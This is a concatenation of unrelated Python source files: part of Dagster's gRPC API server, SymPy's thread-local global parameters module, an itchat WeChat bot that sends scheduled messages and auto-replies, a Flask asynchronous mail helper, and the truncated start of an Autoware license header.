self.__heartbeat_thread = threading.Thread(
target=self._heartbeat_thread,
args=(heartbeat_timeout,),
name="grpc-server-heartbeat",
)
self.__heartbeat_thread.daemon = True
self.__heartbeat_thread.start()
else:
self.__heartbeat_thread = None
self.__cleanup_thread = threading.Thread(
target=self._cleanup_thread, args=(), name="grpc-server-cleanup"
)
self.__cleanup_thread.daemon = True
self.__cleanup_thread.start()
def cleanup(self):
if self.__heartbeat_thread:
self.__heartbeat_thread.join()
self.__cleanup_thread.join()
def _heartbeat_thread(self, heartbeat_timeout):
while True:
self._shutdown_once_executions_finish_event.wait(heartbeat_timeout)
if self._shutdown_once_executions_finish_event.is_set():
break
if self.__last_heartbeat_time < time.time() - heartbeat_timeout:
self._shutdown_once_executions_finish_event.set()
def _cleanup_thread(self):
while True:
self._server_termination_event.wait(CLEANUP_TICK)
if self._server_termination_event.is_set():
break
self._check_for_orphaned_runs()
def _check_for_orphaned_runs(self):
with self._execution_lock:
runs_to_clear = []
for run_id, (process, instance_ref) in self._executions.items():
if not process.is_alive():
with DagsterInstance.from_ref(instance_ref) as instance:
runs_to_clear.append(run_id)
run = instance.get_run_by_id(run_id)
if not run or run.is_finished:
continue
# the process died in an unexpected manner. inform the system
message = "Pipeline execution process for {run_id} unexpectedly exited.".format(
run_id=run.run_id
)
instance.report_engine_event(message, run, cls=self.__class__)
instance.report_run_failed(run)
for run_id in runs_to_clear:
self._clear_run(run_id)
# Once there are no more running executions after we have received a request to
# shut down, terminate the server
if self._shutdown_once_executions_finish_event.is_set():
if len(self._executions) == 0:
self._server_termination_event.set()
# Assumes execution lock is being held
def _clear_run(self, run_id):
del self._executions[run_id]
del self._termination_events[run_id]
if run_id in self._termination_times:
del self._termination_times[run_id]
def _recon_repository_from_origin(self, external_repository_origin):
check.inst_param(
external_repository_origin, "external_repository_origin", ExternalRepositoryOrigin,
)
return ReconstructableRepository(
self._repository_symbols_and_code_pointers.code_pointers_by_repo_name[
external_repository_origin.repository_name
],
self._get_current_image(),
)
def _recon_pipeline_from_origin(self, external_pipeline_origin):
check.inst_param(
external_pipeline_origin, "external_pipeline_origin", ExternalPipelineOrigin
)
recon_repo = self._recon_repository_from_origin(
external_pipeline_origin.external_repository_origin
)
return recon_repo.get_reconstructable_pipeline(external_pipeline_origin.pipeline_name)
def Ping(self, request, _context):
echo = request.echo
return api_pb2.PingReply(echo=echo)
def StreamingPing(self, request, _context):
sequence_length = request.sequence_length
echo = request.echo
for sequence_number in range(sequence_length):
yield api_pb2.StreamingPingEvent(sequence_number=sequence_number, echo=echo)
def Heartbeat(self, request, _context):
self.__last_heartbeat_time = time.time()
echo = request.echo
return api_pb2.PingReply(echo=echo)
def GetServerId(self, _request, _context):
return api_pb2.GetServerIdReply(server_id=self._server_id)
def ExecutionPlanSnapshot(self, request, _context):
execution_plan_args = deserialize_json_to_dagster_namedtuple(
request.serialized_execution_plan_snapshot_args
)
check.inst_param(execution_plan_args, "execution_plan_args", ExecutionPlanSnapshotArgs)
recon_pipeline = self._recon_pipeline_from_origin(execution_plan_args.pipeline_origin)
execution_plan_snapshot_or_error = get_external_execution_plan_snapshot(
recon_pipeline, execution_plan_args
)
return api_pb2.ExecutionPlanSnapshotReply(
serialized_execution_plan_snapshot=serialize_dagster_namedtuple(
execution_plan_snapshot_or_error
)
)
def ListRepositories(self, request, _context):
try:
response = ListRepositoriesResponse(
self._repository_symbols_and_code_pointers.loadable_repository_symbols,
executable_path=self._loadable_target_origin.executable_path
if self._loadable_target_origin
else None,
repository_code_pointer_dict=(
self._repository_symbols_and_code_pointers.code_pointers_by_repo_name
),
)
except Exception: # pylint: disable=broad-except
response = serializable_error_info_from_exc_info(sys.exc_info())
return api_pb2.ListRepositoriesReply(
serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(response)
)
def ExternalPartitionNames(self, request, _context):
partition_names_args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_names_args
)
check.inst_param(partition_names_args, "partition_names_args", PartitionNamesArgs)
recon_repo = self._recon_repository_from_origin(partition_names_args.repository_origin)
return api_pb2.ExternalPartitionNamesReply(
serialized_external_partition_names_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_names(recon_repo, partition_names_args.partition_set_name,)
)
)
def ExternalPartitionSetExecutionParams(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_set_execution_param_args
)
check.inst_param(
args, "args", PartitionSetExecutionParamArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalPartitionSetExecutionParamsReply(
serialized_external_partition_set_execution_param_data_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_set_execution_param_data(
recon_repo=recon_repo,
partition_set_name=args.partition_set_name,
partition_names=args.partition_names,
)
)
)
def ExternalPartitionConfig(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(args, "args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalPartitionConfigReply(
serialized_external_partition_config_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_config(recon_repo, args.partition_set_name, args.partition_name)
)
)
def ExternalPartitionTags(self, request, _context):
partition_args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(partition_args, "partition_args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(partition_args.repository_origin)
return api_pb2.ExternalPartitionTagsReply(
serialized_external_partition_tags_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_tags(
recon_repo, partition_args.partition_set_name, partition_args.partition_name
)
)
)
def ExternalPipelineSubsetSnapshot(self, request, _context):
pipeline_subset_snapshot_args = deserialize_json_to_dagster_namedtuple(
request.serialized_pipeline_subset_snapshot_args
)
check.inst_param(
pipeline_subset_snapshot_args,
"pipeline_subset_snapshot_args",
PipelineSubsetSnapshotArgs,
)
return api_pb2.ExternalPipelineSubsetSnapshotReply(
serialized_external_pipeline_subset_result=serialize_dagster_namedtuple(
get_external_pipeline_subset_result(
self._recon_pipeline_from_origin(pipeline_subset_snapshot_args.pipeline_origin),
pipeline_subset_snapshot_args.solid_selection,
)
)
)
def _get_serialized_external_repository_data(self, request):
repository_origin = deserialize_json_to_dagster_namedtuple(
request.serialized_repository_python_origin
)
check.inst_param(repository_origin, "repository_origin", ExternalRepositoryOrigin)
recon_repo = self._recon_repository_from_origin(repository_origin)
return serialize_dagster_namedtuple(
external_repository_data_from_def(recon_repo.get_definition())
)
def ExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
return api_pb2.ExternalRepositoryReply(
serialized_external_repository_data=serialized_external_repository_data,
)
def StreamingExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
num_chunks = int(
math.ceil(
float(len(serialized_external_repository_data))
/ STREAMING_EXTERNAL_REPOSITORY_CHUNK_SIZE
)
)
for i in range(num_chunks):
start_index = i * STREAMING_EXTERNAL_REPOSITORY_CHUNK_SIZE
end_index = min(
(i + 1) * STREAMING_EXTERNAL_REPOSITORY_CHUNK_SIZE,
len(serialized_external_repository_data),
)
yield api_pb2.StreamingExternalRepositoryEvent(
sequence_number=i,
serialized_external_repository_chunk=serialized_external_repository_data[
start_index:end_index
],
)
def ExternalScheduleExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_schedule_execution_args
)
check.inst_param(
args, "args", ExternalScheduleExecutionArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalScheduleExecutionReply(
serialized_external_schedule_execution_data_or_external_schedule_execution_error=serialize_dagster_namedtuple(
get_external_schedule_execution(
recon_repo,
args.instance_ref,
args.schedule_name,
args.scheduled_execution_timestamp,
args.scheduled_execution_timezone,
)
)
)
def ExternalSensorExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_sensor_execution_args
)
check.inst_param(args, "args", SensorExecutionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalSensorExecutionReply(
serialized_external_sensor_execution_data_or_external_sensor_execution_error=serialize_dagster_namedtuple(
get_external_sensor_execution(
recon_repo,
args.instance_ref,
args.sensor_name,
args.last_completion_time,
args.last_run_key,
)
)
)
def ShutdownServer(self, request, _context):
try:
self._shutdown_once_executions_finish_event.set()
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(success=True, serializable_error_info=None)
)
)
except: # pylint: disable=bare-except
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(
success=False,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
def CancelExecution(self, request, _context):
success = False
message = None
serializable_error_info = None
try:
cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_cancel_execution_request),
CancelExecutionRequest,
)
with self._execution_lock:
if cancel_execution_request.run_id in self._executions:
self._termination_events[cancel_execution_request.run_id].set()
self._termination_times[cancel_execution_request.run_id] = time.time()
success = True
except: # pylint: disable=bare-except
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
return api_pb2.CancelExecutionReply(
serialized_cancel_execution_result=serialize_dagster_namedtuple(
CancelExecutionResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def CanCancelExecution(self, request, _context):
can_cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_can_cancel_execution_request),
CanCancelExecutionRequest,
)
with self._execution_lock:
run_id = can_cancel_execution_request.run_id
can_cancel = (
run_id in self._executions and not self._termination_events[run_id].is_set()
)
return api_pb2.CanCancelExecutionReply(
serialized_can_cancel_execution_result=serialize_dagster_namedtuple(
CanCancelExecutionResult(can_cancel=can_cancel)
)
)
def StartRun(self, request, _context):
if self._shutdown_once_executions_finish_event.is_set():
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message="Tried to start a run on a server after telling it to shut down",
serializable_error_info=None,
)
)
)
try:
execute_run_args = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_execute_run_args),
ExecuteExternalPipelineArgs,
)
run_id = execute_run_args.pipeline_run_id
recon_pipeline = self._recon_pipeline_from_origin(execute_run_args.pipeline_origin)
except: # pylint: disable=bare-except
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message=None,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
event_queue = multiprocessing.Queue()
termination_event = multiprocessing.Event()
execution_process = multiprocessing.Process(
target=start_run_in_subprocess,
args=[
request.serialized_execute_run_args,
recon_pipeline,
event_queue,
termination_event,
],
)
with self._execution_lock:
execution_process.start()
self._executions[run_id] = (
execution_process,
execute_run_args.instance_ref,
)
self._termination_events[run_id] = termination_event
success = None
message = None
serializable_error_info = None
while success is None:
time.sleep(EVENT_QUEUE_POLL_INTERVAL)
# We use `get_nowait()` instead of `get()` so that we can handle the case where the
# execution process has died unexpectedly -- `get()` would hang forever in that case
try:
dagster_event_or_ipc_error_message_or_done = event_queue.get_nowait()
except queue.Empty:
if not execution_process.is_alive():
# subprocess died unexpectedly
success = False
message = (
"GRPC server: Subprocess for {run_id} terminated unexpectedly with "
"exit code {exit_code}".format(
run_id=run_id, exit_code=execution_process.exitcode,
)
)
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
else:
if isinstance(
dagster_event_or_ipc_error_message_or_done, StartRunInSubprocessSuccessful
):
success = True
elif isinstance(
dagster_event_or_ipc_error_message_or_done, RunInSubprocessComplete
):
continue
if isinstance(dagster_event_or_ipc_error_message_or_done, IPCErrorMessage):
success = False
message = dagster_event_or_ipc_error_message_or_done.message
serializable_error_info = (
dagster_event_or_ipc_error_message_or_done.serializable_error_info
)
# Ensure that if the run failed, we remove it from the executions map before
# returning so that CanCancel will never return True
if not success:
with self._execution_lock:
self._clear_run(run_id)
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def _get_current_image(self):
return os.getenv("DAGSTER_CURRENT_IMAGE")
def GetCurrentImage(self, request, _context):
return api_pb2.GetCurrentImageReply(
serialized_current_image=serialize_dagster_namedtuple(
GetCurrentImageResult(
current_image=self._get_current_image(), serializable_error_info=None
)
)
)
@whitelist_for_serdes
class GrpcServerStartedEvent(namedtuple("GrpcServerStartedEvent", "")):
pass
@whitelist_for_serdes
class GrpcServerFailedToBindEvent(namedtuple("GrpcServerStartedEvent", "")):
pass
def server_termination_target(termination_event, server):
termination_event.wait()
# We could make this grace period configurable if we set it in the ShutdownServer handler
server.stop(grace=5)
class DagsterGrpcServer:
def __init__(
self,
host="localhost",
port=None,
socket=None,
max_workers=1,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
ipc_output_file=None,
fixed_server_id=None,
):
check.opt_str_param(host, "host")
check.opt_int_param(port, "port")
check.opt_str_param(socket, "socket")
check.int_param(max_workers, "max_workers")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.invariant(
port is not None if seven.IS_WINDOWS else True,
"You must pass a valid `port` on Windows: `socket` not supported.",
)
check.invariant(
(port or socket) and not (port and socket),
"You must pass one and only one of `port` or `socket`.",
)
check.invariant(
host is not None if port else True, "Must provide a host when serving on a port",
)
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
self._ipc_output_file = check.opt_str_param(ipc_output_file, "ipc_output_file")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.invariant(
max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 if heartbeat is True",
)
self.server = grpc.server(ThreadPoolExecutor(max_workers=max_workers))
self._server_termination_event = threading.Event()
self._api_servicer = DagsterApiServer(
server_termination_event=self._server_termination_event,
loadable_target_origin=loadable_target_origin,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
)
# Create a health check servicer
self._health_servicer = health.HealthServicer()
health_pb2_grpc.add_HealthServicer_to_server(self._health_servicer, self.server)
add_DagsterApiServicer_to_server(self._api_servicer, self.server)
if port:
server_address = host + ":" + str(port)
else:
server_address = "unix:" + os.path.abspath(socket)
# grpc.Server.add_insecure_port returns:
# - 0 on failure
# - port number when a port is successfully bound
# - 1 when a UDS is successfully bound
res = self.server.add_insecure_port(server_address)
if socket and res != 1:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(socket)
if port and res != port:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(port)
def serve(self):
# Unfortunately it looks like ports bind late (here) and so this can fail with an error
# from C++ like:
#
# E0625 08:46:56.180112000 4697443776 server_chttp2.cc:40]
# {"created":"@1593089216.180085000","description":"Only 1 addresses added out of total
# 2 resolved","file":"src/core/ext/transport/chttp2/server/chttp2_server.cc",
# "file_line":406,"referenced_errors":[{"created":"@1593089216.180083000","description":
# "Unable to configure socket","fd":6,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":217,
# "referenced_errors":[{"created":"@1593089216.180079000",
# "description":"Address already in use","errno":48,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":190,"os_error":
# "Address already in use","syscall":"bind"}]}]}
#
# This is printed to stdout and there is no return value from server.start or exception
# raised in Python that we can use to handle this. The standard recipes for hijacking C
# stdout (so we could inspect this output and respond accordingly), e.g.
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/, don't seem
# to work (at least on Mac OS X) against grpc, and in any case would involve a huge
# cross-version and cross-platform maintenance burden. We have an issue open against grpc,
# https://github.com/grpc/grpc/issues/23315, and our own tracking issue at
self.server.start()
# Note: currently this is hardcoded as serving, since both services are cohosted
# pylint: disable=no-member
self._health_servicer.set("DagsterApi", health_pb2.HealthCheckResponse.SERVING)
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerStartedEvent())
server_termination_thread = threading.Thread(
target=server_termination_target,
args=[self._server_termination_event, self.server],
name="grpc-server-termination",
)
server_termination_thread.daemon = True
server_termination_thread.start()
self.server.wait_for_termination()
server_termination_thread.join()
self._api_servicer.cleanup()
class CouldNotStartServerProcess(Exception):
def __init__(self, port=None, socket=None):
super(CouldNotStartServerProcess, self).__init__(
"Could not start server with "
+ (
"port {port}".format(port=port)
if port is not None
else "socket {socket}".format(socket=socket)
)
)
def wait_for_grpc_server(server_process, ipc_output_file, timeout=15):
event = read_unary_response(ipc_output_file, timeout=timeout, ipc_process=server_process)
if isinstance(event, GrpcServerFailedToBindEvent):
raise CouldNotBindGrpcServerToAddress()
elif isinstance(event, GrpcServerStartedEvent):
return True
else:
raise Exception(
"Received unexpected IPC event from gRPC Server: {event}".format(event=event)
)
def open_server_process(
port,
socket,
loadable_target_origin=None,
max_workers=1,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
):
check.invariant((port or socket) and not (port and socket), "Set only port or socket")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.int_param(max_workers, "max_workers")
from dagster.core.test_utils import get_mocked_system_timezone
with seven.TemporaryDirectory() as temp_dir:
output_file = os.path.join(
temp_dir, "grpc-server-startup-{uuid}".format(uuid=uuid.uuid4().hex)
)
mocked_system_timezone = get_mocked_system_timezone()
subprocess_args = (
[
loadable_target_origin.executable_path
if loadable_target_origin and loadable_target_origin.executable_path
else sys.executable,
"-m",
"dagster.grpc",
]
+ (["--port", str(port)] if port else [])
+ (["--socket", socket] if socket else [])
+ ["-n", str(max_workers)]
+ (["--heartbeat"] if heartbeat else [])
+ (["--heartbeat-timeout", str(heartbeat_timeout)] if heartbeat_timeout else [])
+ (["--lazy-load-user-code"] if lazy_load_user_code else [])
+ (["--ipc-output-file", output_file])
+ (["--fixed-server-id", fixed_server_id] if fixed_server_id else [])
+ (
["--override-system-timezone", mocked_system_timezone]
if mocked_system_timezone
else []
)
)
if loadable_target_origin:
subprocess_args += loadable_target_origin.get_cli_args()
server_process = open_ipc_subprocess(subprocess_args)
try:
wait_for_grpc_server(server_process, output_file)
except:
if server_process.poll() is None:
server_process.terminate()
raise
return server_process
def open_server_process_on_dynamic_port(
max_retries=10,
loadable_target_origin=None,
max_workers=1,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
):
server_process = None
retries = 0
while server_process is None and retries < max_retries:
port = find_free_port()
try:
server_process = open_server_process(
port=port,
socket=None,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
)
except CouldNotBindGrpcServerToAddress:
pass
retries += 1
return server_process, port
def cleanup_server_process(server_process, timeout=3):
start_time = time.time()
while server_process.poll() is None and (time.time() - start_time) < timeout:
time.sleep(0.05)
if server_process.poll() is None:
server_process.terminate()
server_process.wait()
class GrpcServerProcess:
def __init__(
self,
loadable_target_origin=None,
force_port=False,
max_retries=10,
max_workers=1,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
):
self.port = None
self.socket = None
self.server_process = None
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.bool_param(force_port, "force_port")
check.int_param(max_retries, "max_retries")
check.int_param(max_workers, "max_workers")
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.bool_param(lazy_load_user_code, "lazy_load_user_code")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.invariant(
max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 if heartbeat is True",
)
if seven.IS_WINDOWS or force_port:
self.server_process, self.port = open_server_process_on_dynamic_port(
max_retries=max_retries,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
)
else:
self.socket = safe_tempfile_path_unmanaged()
self.server_process = open_server_process(
port=None,
socket=self.socket,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
)
if self.server_process is None:
raise CouldNotStartServerProcess(port=self.port, socket=self.socket)
def wait(self, timeout=30):
if self.server_process.poll() is None:
seven.wait_for_process(self.server_process, timeout=timeout)
def create_ephemeral_client(self):
from dagster.grpc.client import EphemeralDagsterGrpcClient
return EphemeralDagsterGrpcClient(
port=self.port, socket=self.socket, server_process=self.server_process
)
|
parameters.py
|
"""Thread-safe global parameters"""
from .cache import clear_cache
from contextlib import contextmanager
from threading import local
class _global_parameters(local):
"""
Thread-local global parameters.
Explanation
===========
This class generates thread-local container for SymPy's global parameters.
Every global parameters must be passed as keyword argument when generating
its instance.
A variable, `global_parameters` is provided as default instance for this class.
WARNING! Although the global parameters are thread-local, SymPy's cache is not
by now.
This may lead to undesired result in multi-threading operations.
Examples
========
>>> from sympy.abc import x
>>> from sympy.core.cache import clear_cache
>>> from sympy.core.parameters import global_parameters as gp
>>> gp.evaluate
True
>>> x+x
2*x
>>> log = []
>>> def f():
... clear_cache()
... gp.evaluate = False
... log.append(x+x)
... clear_cache()
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> print(log)
[x + x]
>>> gp.evaluate
True
>>> x+x
2*x
References
==========
.. [1] https://docs.python.org/3/library/threading.html
"""
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
def __setattr__(self, name, value):
if getattr(self, name) != value:
clear_cache()
return super().__setattr__(name, value)
global_parameters = _global_parameters(evaluate=True, distribute=True, exp_is_pow=False)
@contextmanager
def evaluate(x):
""" Control automatic evaluation
Explanation
===========
This context manager controls whether or not all SymPy functions evaluate
by default.
Note that much of SymPy expects evaluated expressions. This functionality
is experimental and is unlikely to function as intended on large
expressions.
Examples
========
>>> from sympy import evaluate
>>> from sympy.abc import x
>>> print(x + x)
2*x
>>> with evaluate(False):
... print(x + x)
x + x
"""
old = global_parameters.evaluate
try:
global_parameters.evaluate = x
yield
finally:
global_parameters.evaluate = old
@contextmanager
def distribute(x):
""" Control automatic distribution of Number over Add
Explanation
===========
This context manager controls whether or not Mul distribute Number over
Add. Plan is to avoid distributing Number over Add in all of sympy. Once
that is done, this contextmanager will be removed.
Examples
========
>>> from sympy.abc import x
>>> from sympy.core.parameters import distribute
>>> print(2*(x + 1))
2*x + 2
>>> with distribute(False):
... print(2*(x + 1))
2*(x + 1)
"""
old = global_parameters.distribute
try:
global_parameters.distribute = x
yield
finally:
global_parameters.distribute = old
@contextmanager
def _exp_is_pow(x):
"""
Control whether `e^x` should be represented as ``exp(x)`` or a ``Pow(E, x)``.
Examples
========
>>> from sympy import exp
>>> from sympy.abc import x
>>> from sympy.core.parameters import _exp_is_pow
>>> with _exp_is_pow(True): print(type(exp(x)))
<class 'sympy.core.power.Pow'>
>>> with _exp_is_pow(False): print(type(exp(x)))
exp
"""
old = global_parameters.exp_is_pow
clear_cache()
try:
global_parameters.exp_is_pow = x
yield
finally:
clear_cache()
global_parameters.exp_is_pow = old
|
hongmeng.py
|
# coding=utf-8
"""
每天定时给多个女友发给微信暖心话
核心代码。
"""
import os
import time
import threading
from apscheduler.schedulers.blocking import BlockingScheduler
import itchat
from itchat.content import TEXT
from main.common import (
get_yaml
)
from main.utils import (
get_bot_info,
get_weather_info,
get_dictum_info,
get_diff_time,
)
reply_name_uuid_list = []
# fire the job again if it was missed within GRACE_PERIOD
GRACE_PERIOD = 15 * 60
def is_online(auto_login=False):
"""
判断是否还在线。
:param auto_login: bool,当为 Ture 则自动重连(默认为 False)。
:return: bool,当返回为 True 时,在线;False 已断开连接。
"""
def _online():
"""
通过获取好友信息,判断用户是否还在线。
:return: bool,当返回为 True 时,在线;False 已断开连接。
"""
try:
if itchat.search_friends():
return True
except IndexError:
return False
return True
if _online(): return True # 如果在线,则直接返回 True
if not auto_login: # 不自动登录,则直接返回 False
return False
# 切换微信号,重新扫码。
is_forced_switch = get_yaml().get('is_forced_switch', False)
for _ in range(2): # 登陆,尝试 2 次。
# 如果需要切换微信,删除 hotReload=True
if os.environ.get('MODE') == 'server':
# 命令行显示登录二维码。
itchat.auto_login(enableCmdQR=2, hotReload=(not is_forced_switch))
else:
itchat.auto_login(hotReload=(not is_forced_switch))
if _online():
print('登录成功')
return True
print('登录失败。')
return False
@itchat.msg_register([TEXT])
def text_reply(msg):
""" 监听用户消息 """
try:
# print(msg)
uuid = msg.fromUserName
if uuid in reply_name_uuid_list:
receive_text = msg.text # 好友发送来的消息
# 通过图灵 api 获取要回复的内容。
reply_text = get_bot_info(receive_text)
time.sleep(1) # 休眠一秒,保安全,想更快的,可以直接用。
if reply_text: # 如内容不为空,回复消息
msg.user.send(reply_text) # 发送回复
print('\n{}发来信息:{}\n回复{}:{}'
.format(msg.user.nickName, receive_text, msg.user.nickName, reply_text))
else:
print('{}发来信息:{}\t自动回复失败'
.format(msg.user.nickName, receive_text))
except Exception as e:
print(str(e))
def init_reply():
"""
初始化自动回复相关数据。
:return:
"""
conf = get_yaml()
for name in conf.get('auto_reply_names', None):
friends = itchat.search_friends(name=name)
if not friends: # 如果用户列表为空,表示用户昵称填写有误。
print('昵称『{}』有误。'.format(name))
break
name_uuid = friends[0].get('UserName') # 取第一个用户的 uuid。
if name_uuid not in reply_name_uuid_list:
reply_name_uuid_list.append(name_uuid)
def get_alarm_msg():
""" 定时提醒内容 """
conf = get_yaml()
for gf in conf.get('girlfriend_infos'):
prompting_msg = "\t \t\t贴心小卫士 \r\n"
dictum = get_dictum_info(gf.get('dictum_channel'))
weather = get_weather_info(gf.get('city_name'))
sweet_words = gf.get('sweet_words')
diff_time = get_diff_time(sweet_words, gf.get('start_date'))
send_msg = '\n'.join(x for x in [prompting_msg, dictum, weather, diff_time] if x)
print(send_msg)
if send_msg and is_online():
wechat_name = gf.get('wechat_name')
authors = itchat.search_friends(name=wechat_name)
if authors:
authors[0].send(send_msg)
print('\n定时给『{}』发送的内容是:\n{}\n发送成功...\n'.format(wechat_name, send_msg))
else:
print('定时提醒发送失败,微信名 {} 失效。'.format(wechat_name))
def init_alarm():
""" 初始化定时提醒 """
alarm_info = get_yaml().get('alarm_info', None)
if not alarm_info: return
is_alarm = alarm_info.get('is_alarm', False)
if not is_alarm: return
alarm_timed = alarm_info.get('alarm_timed', None)
if not alarm_timed: return
hour, minute = [int(x) for x in alarm_timed.split(':')]
# 定时任务
scheduler = BlockingScheduler()
# 每天9:30左右给女朋友发送每日一句
scheduler.add_job(get_alarm_msg, 'cron', hour=hour,
minute=minute, misfire_grace_time=GRACE_PERIOD)
# 每隔 2 分钟发送一条数据用于测试。
# scheduler.add_job(get_alarm_msg, 'interval', seconds=120)
print('已开启定时发送提醒功能...')
scheduler.start()
def run():
""" 主运行入口 """
if not is_online(auto_login=True):
print('登录失败')
return
conf = get_yaml()
if conf.get('is_auto_relay', False):
def _itchatRun():
itchat.run()
init_reply()
thread = threading.Thread(target=_itchatRun, name='LoopThread')
thread.start()
print('已开启图灵自动回复...')
init_alarm()
thread.join()
else:
init_alarm()
if __name__ == '__main__':
run()
# get_alarm_msg()
pass
|
mail.py
|
#!/usr/bin/env python
# -*- coding=UTF-8 -*-
# *************************************************************************
# Copyright © 2015 JiangLin. All rights reserved.
# File Name: email.py
# Author:JiangLin
# Mail:xiyang0807@gmail.com
# Created Time: 2015-11-27 21:59:02
# *************************************************************************
from flask_mail import Mail
from flask_mail import Message
from threading import Thread
from itsdangerous import URLSafeTimedSerializer
from flask import current_app
class MapleMail(Mail):
def init_app(self, app):
self.app = app
super(MapleMail, self).init_app(app)
def send_async_email(self, app, msg):
with app.app_context():
self.send(msg)
def custom_email_send(self, to, template, subject):
msg = Message(subject, recipients=[to], html=template)
thr = Thread(target=self.send_async_email, args=[self.app, msg])
thr.start()
def custom_email_token(self, email):
config = current_app.config
serializer = URLSafeTimedSerializer(config['SECRET_KEY'])
token = serializer.dumps(email, salt=config['SECURITY_PASSWORD_SALT'])
return token
def custom_confirm_token(self, token, expiration=360):
config = current_app.config
serializer = URLSafeTimedSerializer(config['SECRET_KEY'])
try:
email = serializer.loads(
token,
salt=config['SECURITY_PASSWORD_SALT'],
max_age=expiration)
except:
return False
return email
|
runtime_manager_dialog.py
|
#!/usr/bin/env python
"""
Copyright (c) 2015, Nagoya University
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Autoware nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
